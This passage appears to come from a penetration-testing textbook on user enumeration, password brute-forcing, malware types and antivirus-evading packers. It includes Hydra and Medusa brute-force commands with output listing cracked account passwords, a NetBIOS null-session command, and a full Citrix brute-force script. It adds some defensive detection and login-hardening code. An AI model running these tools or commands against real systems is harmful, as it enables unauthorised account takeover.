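    stats = defaultdict(lambda: {"probe_commands": 0, "rcpt": 0, "rcpt_rejected": 0})
    last_cmd = {}   # client -> verb of its most recent command, to attribute replies
    for line in lines:
        client, direction, text = line.split(" ", 2)
        if direction == "C":
            verb = text.split(":", 1)[0].split()[0].upper()   # "RCPT TO:<x>" -> "RCPT"
            last_cmd[client] = verb
            if verb in PROBE_COMMANDS:
                stats[client]["probe_commands"] += 1
            elif verb == "RCPT":
                stats[client]["rcpt"] += 1
        elif direction == "S":
            if last_cmd.get(client) == "RCPT" and text[:1] == "5":
                stats[client]["rcpt_rejected"] += 1
    for s in stats.values():
        rejected_share = s["rcpt_rejected"] / s["rcpt"] if s["rcpt"] else 0.0
        s["suspicious"] = s["probe_commands"] > 0 or (
            s["rcpt"] >= min_rcpt and rejected_share >= reject_ratio)
    return dict(stats)


if __name__ == "__main__":
    for client, s in analyze_sessions(SAMPLE_LOG).items():
        print(client, s)
```

VRFY and EXPN can also be switched off at the MTA itself (Postfix: disable_vrfy_command = yes; Sendmail: the novrfy and noexpn PrivacyOptions), which leaves only the RCPT TO pattern for the detector to watch.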
Private User Directories

Apache User Enumeration
http://www.example.com/~<username>

When a remote user makes a request for a possible user's default home page, the server returns one of three responses:
• In a case where username is a valid user account and has been configured with a homepage, the server responds with the user's homepage.
• When username exists on the system but has not been assigned a homepage document, the server returns the message "You don't have permission to access /~username on this server."
• If the tested username does not exist as an account on the system, the Apache server's response includes the message "The requested URL /~username was not found on this server." or refers to the default error page configured for this error.

For Example: When the user doesn’t exist, it redirects to the website main page:

WordPress Authors Template User Enumeration Vulnerability
There are other places where you might be able to find some usernames. A good example is WordPress author templates, which allow you to extract usernames through URLs with the following syntax: /wordpress/author/authorname/ i.e.:
http://www.target-domain.com/wordpress/author/admin/
http://www.target-domain.com/wordpress/author/root/

A case when the user doesn’t exist:

A case when the user exists:
FTP CWD Username Enumeration Vulnerability (Example: Solaris in.ftpd)
The Sun Solaris operating system contains a built-in FTP server called “in.ftpd”. This FTP server has a classic user enumeration vulnerability. When a user is logged on to the server, even with anonymous access, he can call the command CWD (Change Working Directory) followed by a username. The server will reply with one response if the user account exists and a different one if it doesn’t. For Example: “CWD ~root”

FTP Server Authentication Delay Username Enumeration Vulnerability (Example: ProFTPD)
A timing attack exists in ProFTPD that could assist a remote user in enumerating usernames. Analysis of the response time during authentication gives an attacker an indication as to whether or not the supplied username is valid. The problem occurs due to different execution paths when the daemon encounters a valid, invalid or privileged username. A remote attacker can exploit this vulnerability to determine which usernames are valid, privileged, or do not exist on the remote system. When an authentication attempt is sent to the FTP server, it will respond slowly if the username exists and faster if it doesn’t.

Telnet

Telnet Server User Field Account Enumeration (Example: Cisco Aironet)
A flaw was discovered in the firmware of the Cisco Aironet AP1100 (version 12.2). The flaw allows a malicious remote user to discover which accounts are valid on the targeted Cisco Aironet Access Point by submitting a user name as the first parameter. If the account exists, the attacker will then be prompted for the password. If not, the server will reply with the message "% Login invalid", revealing that the account doesn’t exist.

Web Server Pre-Login – HTTP Response based enumeration (Example: Lotus Domino)
An issue was reported in Lotus Domino server (“Lotus Domino Username Enumeration Vulnerability”), which could allow remote users to determine the validity of a username existing on a host. When a remote user submits a GET request for a possible user's account, the server response assists the user in determining the validity of the username submitted. If the submitted username is valid, the server replies with an HTTP 200 OK message and the login screen. Alternatively, when the submitted username is not valid (meaning that it does not exist on the system), the server responds with a 404 File Not Found message. Because the server responds differently depending on whether or not the username is valid, an attacker can test and enumerate possible usernames.

Error Message User Enumeration:
Most systems developed in the last decade are web applications. Most of these applications require a user login mechanism, which is developed by the companies themselves. As secure development is not taught in universities in the common Computer Science and Software Engineering degrees, most developers make the same common mistakes when developing a login mechanism. The most common mistake is the application replying with one error message when the user account exists and a different one when it doesn’t. For Example:
• System Registration Error Message User Enumeration
  o Sorry, there is already an account registered with the same email address.
• System Login Error Message User Enumeration
  o Authentication failure: entered username does not exist.
  o Authentication failure: incorrect password entered.
• System “Forgot Password” Error/Success Message User Enumeration
  o Sorry, the email address entered does not exist.
  o A new password has been sent to your email address.
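The two login mistakes described in this part (distinct error messages, and the ProFTPD-style timing difference from taking a shorter path for unknown users) can be shown side by side. The following is an added example, not code from the book: a leaky login check beside a uniform one, with a constructed in-memory user store and PBKDF2 parameters chosen only for the illustration.

```python
"""Added example, not from the book: username-enumeration-safe login check.

login_leaky() reproduces the two mistakes from the text: a message that says
which half of the credential was wrong, and an early return for unknown users
that skips the password hash (a measurable timing difference).
login_uniform() returns one message and does the same hashing work on every
path. The user store and PBKDF2 cost are constructed for this example.
"""
import hashlib
import hmac
import os

SALT_LEN = 16
ITERATIONS = 50_000          # illustration only; size this for your hardware


def _hash(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)


def make_user(password: str) -> dict:
    salt = os.urandom(SALT_LEN)
    return {"salt": salt, "hash": _hash(password, salt)}


# Constructed user database for the example.
USERS = {"alice": make_user("correct horse battery staple")}

# A dummy record with the same cost so unknown-user attempts do the same work.
_DUMMY = make_user("unused-dummy-password")

UNIFORM_MESSAGE = "Authentication failure: invalid username or password."


def login_leaky(username: str, password: str):
    """Vulnerable: message and work done differ for unknown vs. known users."""
    user = USERS.get(username)
    if user is None:                                   # fast path, no hashing
        return False, "Authentication failure: entered username does not exist."
    if not hmac.compare_digest(_hash(password, user["salt"]), user["hash"]):
        return False, "Authentication failure: incorrect password entered."
    return True, "Welcome"


def login_uniform(username: str, password: str):
    """Hardened: one message, and a PBKDF2 computation on every path."""
    record = USERS.get(username, _DUMMY)               # always hash something
    ok = hmac.compare_digest(_hash(password, record["salt"]), record["hash"])
    ok = ok and username in USERS                      # the dummy never logs in
    if ok:
        return True, "Welcome"
    return False, UNIFORM_MESSAGE
    # Registration and "forgot password" flows need the same treatment: reply
    # "if an account exists for this address, an email has been sent" in both cases.


if __name__ == "__main__":
    for fn in (login_leaky, login_uniform):
        print(fn.__name__, fn("nobody", "x")[1], "|", fn("alice", "x")[1])
```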
NetBIOS User Enumeration The LSA (Local Security Authority) server on every Windows machine is the service which handles the user login and determines the access levels each user gets to the system objects when he connects to system services such as RPC, WMI, Remote Desktop and NetBIOS.
On Windows Server 2003 and earlier, the “RestrictAnonymous” setting is configured by default to allow unauthenticated users to retrieve information regarding any and all local/domain users (RestrictAnonymous=0). This setting allows an attacker to connect to the server using no username and password, for example by using:

cmd /c net use \\domain_server /user:"" ""

or by using the common NetBIOS user enumeration tool written by SecurityFriday, “GetAcct”:

It is also possible to use the tool Winfingerprint and obtain information from all common services exposed by a local server on the network:

McAfee Foundstone SuperScan 4:

NetBIOS Enumerator
GFI LANguard

SNMP Enumeration
It is possible to obtain system information about the remote host by sending SNMP requests with a remotely existing “OID” (Object ID) such as 1.3.6.1.2.1.1.1. An attacker may use this information to gain more knowledge about the target host. An attacker is able to remotely discover the machine's usernames, IPs connected to the machine, MAC addresses, internal IPs, gateways and DNS servers (which can be used for DNS attacks in order to take over the internal network). The attacker also learns the exact model and firmware version of the machine and can use it to create a reliable exploit. An example of remote SNMP enumeration:

DNS Enumeration
A penetration test project begins by collecting information and mapping all the organization’s remotely accessible servers. The Domain Name System can be used to extract some of the existing subdomains and discover more IPs, with different server types, from Web Servers to Firewalls, VPNs and Citrix Servers. The DNS subdomains can be enumerated by using a dictionary of common subdomain names such as “mail”, “webmail”, “vpn”, “backoffice”, “fw”, etc. In order to find customized subdomain names, an attacker must run a full remote brute force attack, which is likely to disclose all subdomain names of 1 to 8 characters in length made of letters and numbers. Since the DNS protocol is UDP-based, the brute force attack is faster than most other network brute force attacks.

Dictionary Based DNS Enumeration

Brute Forcing DNS Sub-Domains

VoIP User Enumeration
Most currently deployed VoIP servers use SIP (Session Initiation Protocol) server implementations, which are very similar to HTTP. In order to authenticate using the SIP protocol, the remote user must specify the extension name to log into. Then the user is required to submit his username and password, where in most cases the extension number is also the username. Several VoIP systems start the first extension number from 100 and set the default password of all extensions to the extension number. This means that for some VoIP servers, the default user names and passwords will be 100:100, 101:101, etc.

Enumerating Extensions:

Enumerate Usernames: (Example: Inter-Asterisk eXchange protocol)
Citrix Published Applications Remote Enumeration
It is possible to use several tools such as:
http://packetstormsecurity.org/defcon10/dc10-vitek/citrix-pa-scan.c
http://packetstormsecurity.org/defcon10/dc10-vitek/citrix-pa-proxy.pl

The Citrix Application Enumeration script can be used as follows:

# ./citrix-pa-scan 212.123.69.1
Citrix Published Application Scanner version 1.0
By Ian Vitek, ian.vitek@ixsecurity.com

212.123.69.1: Found Applications:
Printer Config
Admin Desktop
i-desktop

It is also possible to use Nmap or Metasploit to enumerate the applications published by a Citrix Server:

$ msfconsole
msf > use auxiliary/gather/citrix_published_bruteforce
msf auxiliary(citrix_published_bruteforce) > set RHOST [TARGET IP]
msf auxiliary(citrix_published_bruteforce) > run

Once found, an application can be manually added to the local ICA client:
System Hacking

Part 1 - Cracking Passwords

Brute Forcing Passwords – Telnet:

Cracking Accounts Using Hydra
Using the tool Hydra by THC (The Hacker’s Choice), it is possible to remotely and reliably crack accounts of almost every commonly used system. Hydra supports cracking accounts over all of the following protocols: imap, imap-ntlm, smb, smbnt, http/https-{head|get|post|post-form}, http-proxy, cisco (telnet), cisco-enable (telnet), vnc, ldap2, ldap3, mssql, mysql, oracle-listener, postgres, nntp, socks5, rexec, rlogin, pcnfs, snmp, rsh, cvs, svn, icq, sapr3, ssh2, smtp-auth, smtp-auth-ntlm, pcanywhere, teamspeak, sip, vmauthd

hydra.exe -L "usernames.txt" -P "passwords.txt" -e ns -o cracked_smbs.txt <any_domain_connected_machine> smb

Example:

[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2010-11-07 17:16:06
[DATA] 1 tasks, 1 servers, 4652972 login tries (l: 11026/p: 422), ~4652972 tries per task
[DATA] attacking service smb on port 139
[STATUS] 8332.00 tries/min, 8332 tries in 00:01h, 4644640 to do in 09:18h
[STATUS] 7643.33 tries/min, 22930 tries in 00:03h, 4630042 to do in 10:06h
[STATUS] 7530.43 tries/min, 52713 tries in 00:07h, 4600259 to do in 10:11h
[139][smb] host: 10.205.200.206 login: PRAVNER password: 12345
[139][smb] host: 10.205.200.206 login: ZORIK password: 12345
[139][smb] host: 10.205.200.206 login: COHSIGAL password: 123456
[139][smb] host: 10.205.200.206 login: INADRIAN password: 123456
[139][smb] host: 10.205.200.206 login: Guest password: Guest
[139][smb] host: 10.205.200.206 login: MLSHOSHANA password: 12345
[139][smb] host: 10.205.200.206 login: MEETING_ROOM password: 12345
[STATUS] 7803.07 tries/min, 117046 tries in 00:15h, 4535926 to do in 09:42h
[139][smb] host: 10.205.200.206 login: SHIL password: 22222
[139][smb] host: 10.205.200.206 login: NTRFAX password: NTRFAX
[139][smb] host: 10.205.200.206 login: EZORLY password: 22222
[139][smb] host: 10.205.200.206 login: anonymous password: anonymous
[139][smb] host: 10.205.200.206 login: INFO password: 12345
[139][smb] host: 10.205.200.206 login: NTJERPDC password: NTJERPDC
[STATUS] 8046.32 tries/min, 249436 tries in 00:31h, 4403536 to do in 09:08h
[139][smb] host: 10.205.200.206 login: GRMINA password: 123456
[139][smb] host: 10.205.200.206 login: BRSHUKI password: 123456
[139][smb] host: 10.205.200.206 login: KZADINA password: 123456
[139][smb] host: 10.205.200.206 login: SPOFER password: 123456
[STATUS] 8254.85 tries/min, 387978 tries in 00:47h, 4264994 to do in 08:37h
[139][smb] host: 10.205.200.206 login: ALROZE password: 123456
[139][smb] host: 10.205.200.206 login: CHYULI password: 12345

Cracking Accounts Using Medusa:
Medusa is very much like Hydra; it supports the following protocols: AFP, CVS, FTP, HTTP, IMAP, MS-SQL, MySQL, NetWare NCP, NNTP, PcAnywhere, POP3, PostgreSQL, REXEC, RLOGIN, RSH, SMBNT, SMTP-AUTH, SMTP-VRFY, SNMP, SSHv2, Subversion (SVN), Telnet, VMware Authentication Daemon (vmauthd), VNC, Generic Wrapper, Web Form

Here is an example of usage and results:

% medusa -h 192.168.0.20 -u administrator -P passwords.txt -e ns -M smbnt
Medusa v1.0-rc1 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks
ACCOUNT CHECK: [smbnt] Host: 192.168.0.20 (1/1) User: administrator (1/1) Password: (1/7)
ACCOUNT CHECK: [smbnt] Host: 192.168.0.20 (1/1) User: administrator (1/1) Password: administrator (2/7)
ACCOUNT CHECK: [smbnt] Host: 192.168.0.20 (1/1) User: administrator (1/1) Password: password (3/7)
ACCOUNT CHECK: [smbnt] Host: 192.168.0.20 (1/1) User: administrator (1/1) Password: pass1 (4/7)
ACCOUNT CHECK: [smbnt] Host: 192.168.0.20 (1/1) User: administrator (1/1) Password: pass2 (5/7)
ACCOUNT CHECK: [smbnt] Host: 192.168.0.20 (1/1) User: administrator (1/1) Password: pass3 (6/7)
ACCOUNT CHECK: [smbnt] Host: 192.168.0.20 (1/1) User: administrator (1/1) Password: pass4 (7/7)

Brute Forcing Check Point Client Authentication Remote Service
The Check Point web Client Authentication Remote Service is just a simple HTML-based authentication form, easily attacked with a common web brute force tool such as Hydra, Medusa, Crowbar, etc. The login page was displayed in the enumeration section. The result of a successful login attempt into a default user in Check Point Firewall looks like this:

Brute Forcing Citrix ICA Servers
The hacker pdp from GNUCITIZEN.org wrote a Citrix Brute Force tool (I guess this was the first public one and for now it seems to be the only one) which uses the “Citrix.ICAClient” COM Object to drive the local Citrix client to make the login attempts. The code is a local JavaScript (JScript) script running under “Windows Script Host”. The listing below restores the whitespace escapes (\s) that the original layout dropped from the regular expressions, and replaces the non-existent JScript call int() with parseInt():

var actns = [];
var pairs = [];
var parms = {};
var util = this;
var usernames = [];
var passwords = [];
var timeout = 5000;

if (WScript.Arguments.length < 3) {
    WScript.Echo('usage: ' + WScript.ScriptName + ' key=value key=value key=value ...');
    WScript.Echo('       ' + WScript.ScriptName + ' TCPBrowserAddress=172.16.3.191 usernames=user1,user2 passwords=pass1,pass2');
    WScript.Echo('       ' + WScript.ScriptName + ' HTTPBrowserAddress=172.16.3.191 userfile=file.txt passfile=file.txt');
    WScript.Echo('       ' + WScript.ScriptName + ' TCPBrowserAddress=172.16.3.191 usernames=user1,user2 passwords=pass1,pass2 timeout=5000');
    WScript.Echo('');
    WScript.Echo('CITRIX Login Bruteforce Utility');
    WScript.Echo('by Petko D. Petkov (pdp) GNUCITIZEN (http://www.gnucitizen.org)');
    WScript.Quit(1);
}

// A throwaway client instance used only to validate unknown key=value options.
var try_out = WScript.CreateObject('Citrix.ICAClient');

for (var i = 0; i < WScript.Arguments.length; i++) {
    var arg = WScript.Arguments(i);
    var tkn = arg.split('=');
    try {
        var name = tkn[0].replace(/^\s+|\s+$/g, '');
        var value = tkn[1].replace(/^\s+|\s+$/g, '');
        switch (name) {
            case 'timeout':
                timeout = parseInt(value, 10);
                if (isNaN(timeout)) {
                    WScript.Echo("option 'timeout' must be an integer value");
                    WScript.Quit(1);
                }
                break;
            case 'usernames':
                var items = value.split(',');
                for (var z = 0; z < items.length; z++) {
                    usernames.push(items[z].replace(/^\s+|\s+$/g, ''));
                }
                break;
            case 'passwords':
                var items = value.split(',');
                for (var z = 0; z < items.length; z++) {
                    passwords.push(items[z].replace(/^\s+|\s+$/g, ''));
                }
                break;
            case 'userfile':
                try {
                    var fso = WScript.CreateObject('Scripting.FileSystemObject');
                    var f = fso.OpenTextFile(value, 1);
                    while (!f.AtEndOfStream) {
                        var line = f.ReadLine();
                        usernames.push(line.replace(/^\s+|\s+$/g, ''));
                    }
                    f.Close();
                } catch (e) {
                    WScript.Echo(e.message);
                    WScript.Quit(1);
                }
                break;
            case 'passfile':
                try {
                    var fso = WScript.CreateObject('Scripting.FileSystemObject');
                    var f = fso.OpenTextFile(value, 1);
                    while (!f.AtEndOfStream) {
                        var line = f.ReadLine();
                        passwords.push(line.replace(/^\s+|\s+$/g, ''));
                    }
                    f.Close();
                } catch (e) {
                    WScript.Echo(e.message);
                    WScript.Quit(1);
                }
                break;
            default:
                // Any other key is passed straight through to the ICA client.
                try_out.SetProp(name, value);
                parms[name] = value;
        }
    } catch (e) {
        WScript.Echo("option '" + arg + "' not recognized");
        WScript.Quit(1);
    }
}

// Bind trailing arguments to f and return a zero-argument closure.
function frap(f) {
    var a = [];
    for (var i = 1; i < arguments.length; i++) {
        a.push(arguments[i]);
    }
    return function () {
        f.apply(f, a);
    };
}

for (var i = 0; i < usernames.length; i++) {
    for (var z = 0; z < passwords.length; z++) {
        pairs.push([usernames[i], passwords[z]]);
    }
}

for (var i = 0; i < pairs.length; i++) {
    actns.push(frap(function (i) {
        // One client object per pair; the '_ica<i>' prefix routes its COM
        // events to util['_ica<i>OnLogon'] below.
        util['_cls' + i] = WScript.CreateObject('Citrix.ICAClient', '_ica' + i);
        util['_ica' + i + 'OnLogon'] = frap(function (i) {
            WScript.Echo(pairs[i]);
            util['_cls' + i].Disconnect();
        }, i);
        for (var z in parms) {
            util['_cls' + i].SetProp(z, parms[z]);
        }
        util['_cls' + i].SetProp('UserName', pairs[i][0]);
        util['_cls' + i].SetProp('Password', pairs[i][1]);
        util['_cls' + i].SetProp('Launch', 'TRUE');
        util['_cls' + i].Connect();
        actns.push(frap(function (i) {
            util['_cls' + i].Disconnect();
        }, i));
    }, i));
}

while (1) {
    var action = actns.pop();
    if (action) {
        action();
    } else {
        WScript.Quit(0);
    }
    WScript.Sleep(timeout);
}

pdp also wrote a script to use Citrix legitimately, after a user and a password were obtained:

var client = WScript.CreateObject('Citrix.ICAClient');

if (WScript.Arguments.length == 0) {
    WScript.Echo('usage: ' + WScript.ScriptName + ' key=value key=value key=value ...');
    WScript.Echo('       ' + WScript.ScriptName + ' TCPBrowserAddress=172.16.3.191 Application=Notepad');
    WScript.Echo('');
    WScript.Echo('CITRIX Client Utility');
    WScript.Echo('by Petko D. Petkov (pdp) GNUCITIZEN (http://www.gnucitizen.org)');
    WScript.Quit(1);
} else {
    for (var i = 0; i < WScript.Arguments.length; i++) {
        var arg = WScript.Arguments(i);
        var tkn = arg.split('=');
        try {
            var name = tkn[0].replace(/^\s+|\s+$/g, '');
            var value = tkn[1].replace(/^\s+|\s+$/g, '');
            client[name] = value;   // each key=value becomes an ICA client property
        } catch (e) {
            WScript.Echo("option '" + arg + "' not recognized");
            WScript.Quit(1);
        }
    }
}

try {
    client.Launch = "TRUE";
    client.Connect();
} catch (e) {
    WScript.Echo(e);
}
Trojans and Backdoors

Effect on Business
In this section we will cover the most common malware in the world, what it does, how it works and how it affects the world’s computer industry and the economy. The types of malware to be covered:
 Dialers
 FraudWare
 Keyloggers
 Spyware & Browser Trojans
 Trojans
 Password Stealers
 RansomWare
 Network Shares/Local Replicating Viruses
 Worms

The following is according to research made by the Ponemon Institute: we see that cybercrime damage cost 45 companies about 52 billion dollars every year. Here we can see that 80% of attacks result in a Trojan, Backdoor, Worm or Virus being installed.

Auto Dialers
 Mutes the modem’s speaker
 Automatically calls 1-900 numbers on your behalf
 You are charged between $1 and $20 or more per minute
 At the end of the month it usually ends with a sum greater than $5000
 Anti-Viruses don’t supply a generic way to stop these viruses; the generic defence is not to let any software create and dial connections

FraudWare
 A fake “Anti-Spyware” or “Anti-Virus” product
 Has a GUI and looks the same as a genuine AV
 Installs some applications on your computer to scare you, for example a red desktop background with a pirate skull and a popup saying “Virus Found, pay to purchase a license and remove it”
 Known signatures by AVs treat it as “Not.a.virus.fraudware” and do nothing
 It may self-update to a real, unknown virus

Keylogger
 Comes in two types:
  ▪ User mode
   ▪ SetWindowsHookEx
   ▪ GetAsyncKeyState
   ▪ Code Example: http://www.rootkit.com/newsread.php?newsid=346
   ▪ Uncaught Example: Keylogger Running Under Kaspersky 2009
  ▪ Kernel Mode
   ▪ A smart driver sitting as low as physically contacting your keyboard
   ▪ Most of them are undetectable and, once run, can shut down and delete any Anti-Virus
   ▪ Code Example: http://www.woodmann.com/forum/attachment.php?attachmentid=1084&d=1093991813
   ▪ 99% uncaught
 How can we differentiate between a Keylogger and a computer game?

Spyware & Browser Trojans
 Integrates itself into your browser
 Tracks browsing/buying preferences
 Steals account passwords
 Bypasses firewalls, as it injects “image requests” into active, user-initiated connections to “safe websites“
 Caught based on signatures and URL blacklists which are modified every day

Trojans
 Integrates itself into your system to stealthily run on each boot
 Opens a shell or connects back to the attacker for a live session or to retrieve “commands”
 Some are integrated with a password stealer and a Keylogger
 A famous Trojan is “SubSeven”
 Easy to write, hard to “detect”, as it performs the same actions legitimate software does (e.g. Skype)

Password Stealers
 Most run once and “commit suicide”; others may integrate themselves into your system to stealthily run on each boot
 Some also have an integrated Keylogger
 Steal passwords saved by clients and typed into clients at runtime (e.g. dialup, email, IE, MSN, YMSN, ICQ/AOL, Oracle, FTP passwords)
 A famous Russian Password Stealer: “Pinch!”
 Easy to write, almost impossible to detect as malicious (“it just reads local non-document files and a few non-system registry entries”, “perhaps it’s a password manager?”)

RansomWare
RansomWare typically propagates as a conventional computer worm, entering a system through, for example, a vulnerability in a network service or an e-mail attachment. It may then:
 Disable an essential system service or lock the display at system startup.
 Encrypt some of the user's personal files. Encrypting RansomWare was originally referred to as crypto-viruses, crypto-Trojans or crypto-worms.
In both cases, the malware may extort by:
 Prompting the user to enter a code obtainable only after wiring payment to the attacker or sending an SMS message and accruing a charge.
 Urging the user to buy a decryption or removal tool.
More sophisticated RansomWare may hybrid-encrypt the victim's plaintext with a random symmetric key and a fixed public key. The malware author is the only party that knows the needed private decryption key. The author who carries out this crypto-viral extortion attack offers to recover the symmetric key for a fee.
 A famous example: “Gpcode”, which used 1024-bit RSA encryption; Kaspersky Anti-Virus labs requested help from the community in order to reach 15 million computers, running for about a year, to crack one variant’s key
 How can such software be detected?! This is an everlasting logical vulnerability: it just reads local files and deletes local files. The Anti-Virus model does not cover file deletion or file reading…
Viruses and Worms

Virus History
Viruses and Worms are the living diseases of computers. They are the only type of software which actually breeds itself and can even mutate completely automatically. There is no doubt that some of the largest damages of all time done to the economy were due to worm outbreaks. Looking at the research done by the Ponemon Institute clearly proves the point.

Local Replicating Viruses
 These are the old-fashioned “DOS days”, well-known “viruses” which infect all the applications in the system in order to spread and survive Anti-Virus removal attempts
 Since Windows 95, these viruses also replicate themselves into writable network shares, and into restricted ones using the logged-on user's credentials
 This virus model was almost extinct until 2004, when it was combined with spreading through P2P file sharing
 The famous “W32/Netsky.c@MM” replicated itself into the KaZaA shared folder with attractive names such as “Microsoft WinXP Crack.exe“
 As the virus industry is now financially motivated, the latest Trojans infect non-built-in startup applications to load on boot without changing the system configuration or files, only the applications whose integrity is not verified.

Worms
 The term defines a virus with non-local, wide-spread propagation techniques
 Began in Windows 95 with Microsoft Office “Macros” (the famous Melissa) until 2002, when macros were disabled by default, together with their cousins, the “Mass-Mailing” worms (the famous “I Love You”), which are still at the top
 The new generation started in 2003 with “W32.Blaster”, followed by “W32.Sasser” and many others
 These are the really money-making and industry-shaping viruses which conquer the world in less than a week
 Today, since there are Firewalls, these worms are spread in combination with browser and email client infections in order to penetrate networks, and use 0-day exploits such as the unbelievable MS08-067

Antivirus
Anti-Virus is software installed on a computer endpoint or on a computer network content gateway (Web, Email…). Its purpose is detecting and removing different kinds of malicious code, from the viruses and worms family up to Trojans and key-loggers. Anti-Viruses have three main operation methods:
1. Signature Based (Black-List) – inspecting any accessed content and comparing strings and code sequences from the disk and the computer’s memory against a preinstalled signature database.
2. Heuristic Based (Patterns) – inspecting the behavior of software in order to find patterns similar to those of known general/generic malicious code. The inspection usually focuses on:
   a) Sequences of calls to different operating system functions
   b) Creating file types with incorrect file extensions in unconventional paths
   c) Application permission requests such as accessing the memory space of other applications
   d) Writing into/over a large amount of enclosed/pre-compiled files such as executable files.
3. Sandbox – running applications “in space”, in a closed environment where it is possible to inspect all that the application is about to do, without it actually being able to harm the machine or make any changes to it.

Packers/Crypters – Bypassing Anti-Viruses
Executable compression is any means of compressing an executable file and combining the compressed data with decompression code into a single executable. When this compressed executable is executed, the decompression code recreates the original code from the compressed code before executing it. In most cases this happens transparently, so the compressed executable can be used in the exact same way as the original. A compressed executable can be considered a self-extracting archive, where compressed data is packaged along with the relevant decompression code in an executable file. Some compressed executables can be decompressed to reconstruct the original executable without directly executing it.

Originally, executable compression was created in order to optimize the on-disk size of executable files, especially for the download of setup installations via the internet. Later on, packing was used by software vendors in order to protect their software from reverse engineering, thereby protecting patents and trade secrets and preventing the cracking of the licensing mechanism. Today executable compressors, aka “Packers”, are used mostly by hackers and virus writers in order to bypass antiviruses and pass known (black-listed) malware through them. There are several types of packers/crypters in common use:
1. Executable Compressor
   a) UPX
2. Traditional Executable Packer
   a) ASPack (Stolen API Bytes)
   b) ASProtect
   c) Stealth EXE Protector
3. Memory Protector (User Mode)
   a) Silicon Realms Armadillo (CopyMem II, Debug blocker, Nanomites)
   b) PESpin (Debug blocker)
4. Memory Protector (Kernel Mode)
   a) Extreme Protector
   b) Obsidium
5. Virtual Machine (with a virtual processor different from the CPU)
   a) Themida
   b) VMProtect
   c) MoleBox
6. Almost infeasible to bypass
   a) StarForce FrontLine ProActive

Netcat - Original - Less than Packed

Bypassing Antivirus – Netcat * MEW
Netcat * RDG PolyPack v1.1

Poison Ivy * SCPack 1.1

Alternate EXE Packer

Poison Ivy * MEW